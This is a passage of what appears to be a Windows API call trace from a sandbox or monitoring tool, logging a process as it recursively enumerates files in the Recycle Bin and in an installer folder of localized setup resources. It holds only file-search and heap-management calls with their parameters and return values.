lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x4260188 [0045.789] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.789] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0045.790] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.790] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260448 [0045.790] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.790] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.790] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.790] FindClose (in: hFindFile=0x4260448 | out: hFindFile=0x4260448) returned 1 [0045.791] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.791] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0045.791] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.791] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42605c8 [0045.791] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.791] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.791] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.791] FindClose (in: hFindFile=0x42605c8 | out: hFindFile=0x42605c8) returned 1 [0045.791] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.791] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0045.791] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0045.791] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0045.792] FindNextFileW (in: hFindFile=0x5e9918, lpFindFileData=0x2e4fcf8 | out: lpFindFileData=0x2e4fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0045.792] FindNextFileW (in: hFindFile=0x5e9918, lpFindFileData=0x2e4fcf8 | out: lpFindFileData=0x2e4fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0045.792] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3c00050 [0045.793] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x42602c8 [0045.816] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.817] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0045.817] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.818] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42607c8 [0045.819] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.819] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.819] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.819] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.819] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.820] FindClose (in: hFindFile=0x42607c8 | out: hFindFile=0x42607c8) returned 1 [0045.820] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.820] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0045.820] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.820] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260748 [0045.821] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.821] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.822] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.822] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.822] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.822] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0045.824] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.824] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0045.824] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.824] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.825] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.825] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.825] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.825] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.826] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.826] FindClose (in: hFindFile=0x4260348 | out: hFindFile=0x4260348) returned 1 [0045.826] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.826] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0045.826] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.826] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42605c8 [0045.827] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.827] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.828] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.828] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, 